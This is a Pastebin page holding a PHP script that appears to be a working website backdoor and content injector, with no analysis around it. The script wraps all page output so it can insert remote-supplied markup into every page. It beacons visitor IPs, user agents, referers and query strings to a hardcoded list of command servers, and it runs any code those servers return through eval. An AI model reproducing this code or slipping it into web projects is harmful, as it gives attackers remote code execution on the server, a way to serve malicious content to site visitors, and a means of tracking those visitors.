Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (!function_exists("GetMama")) {
- function mod_con($buf){
- str_ireplace("<body>","<body>",$buf,$cnt_h);
- if ($cnt_h == 1) {
- $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
- return $buf;
- }
- str_ireplace("</body>","</body>",$buf,$cnt_h);
- if ($cnt_h == 1) {
- $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
- return $buf;
- }
- return $buf;
- }
- function opanki($buf)
- {
- $gz_e = false;
- $h_l = headers_list();
- if (in_array("Content-Encoding: gzip", $h_l)) {
- $gz_e = true;
- }
- if ($gz_e) {
- $tmpfname = tempnam("/tmp", "FOO");
- file_put_contents($tmpfname, $buf);
- $zd = gzopen($tmpfname, "r");
- $contents = gzread($zd, 10000000);
- $contents = mod_con($contents);
- gzclose($zd);
- unlink($tmpfname);
- $contents = gzencode($contents);
- } else {
- $contents = mod_con($buf);
- }
- $len = strlen($contents);
- header("Content-Length: ".$len);
- return($contents);
- }
- function GetMama(){
- $mother = "raskras39.ru";
- return $mother;
- }
- ob_start("opanki");
- function ahfudflfzdhfhs($pa)
- {
- $mama = GetMama();
- $file = urlencode(__FILE__);
- if (isset($_SERVER["HTTP_HOST"])) {
- $host = $_SERVER["HTTP_HOST"];
- } else {
- $host = "";
- }
- if (isset($_SERVER["REMOTE_ADDR"])) {
- $ip = $_SERVER["REMOTE_ADDR"];
- } else {
- $ip = "";
- }
- if (isset($_SERVER["HTTP_REFERER"])) {
- $ref = urlencode($_SERVER["HTTP_REFERER"]);
- } else {
- $ref = "";
- }
- if (isset($_SERVER["HTTP_USER_AGENT"])) {
- $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
- } else {
- $ua = "";
- }
- if (isset($_SERVER["QUERY_STRING"])) {
- $qs = urlencode($_SERVER["QUERY_STRING"]);
- } else {
- $qs = "";
- }
- $url_0 = "http://" . $pa;
- $url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
- $try = true;
- if (function_exists("curl_init") ) {
- $ch = curl_init($url_0 . $url_1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_TIMEOUT, 3);
- $ult = trim(curl_exec($ch));
- $try = false;
- }
- if ((ini_get("allow_url_fopen")) && $try) {
- $ult = trim(@file_get_contents($url_0 . $url_1));
- $try = false;
- }
- if ($try) {
- $fp = fsockopen($pa, 80, $errno, $errstr, 30);
- if ($fp) {
- $out = "GET $url_1 HTTP/1.0\r\n";
- $out .= "Host: $pa\r\n";
- $out .= "Connection: Close\r\n\r\n";
- fwrite($fp, $out);
- $ret = "";
- while (!feof($fp)) {
- $ret .= fgets($fp, 128);
- }
- fclose($fp);
- $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
- }
- }
- if (strpos($ult,"eval") !== false) {
- $z = stripslashes(str_replace("eval","",$ult));
- eval($z);
- exit();
- }
- if (strpos($ult,"ebna") !== false) {
- $_SERVER["good"] = str_replace("ebna","",$ult);
- return true;
- } else {
- return false;
- }
- }
- $father2[] = "77.81.241.253";
- $father2[] = "46.249.58.135";
- $father2[] = "176.9.241.150";
- $father2[] = "46.37.169.56";
- $father2[] = "94.242.255.35";
- $father2[] = "178.162.129.223";
- $father2[] = "31.184.234.96";
- $father2[] = "77.95.18.189";
- $father2[] = "93.170.137.22";
- $father2[] = "188.40.95.244";
- $father2[] = "199.115.231.58";
- $father2[] = "82.192.87.178";
- $father2[] = "216.246.99.215";
- $father2[] = "95.211.18.79";
- shuffle($father2);
- foreach($father2 as $ur){
- if (ahfudflfzdhfhs($ur) ) {
- break ;
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
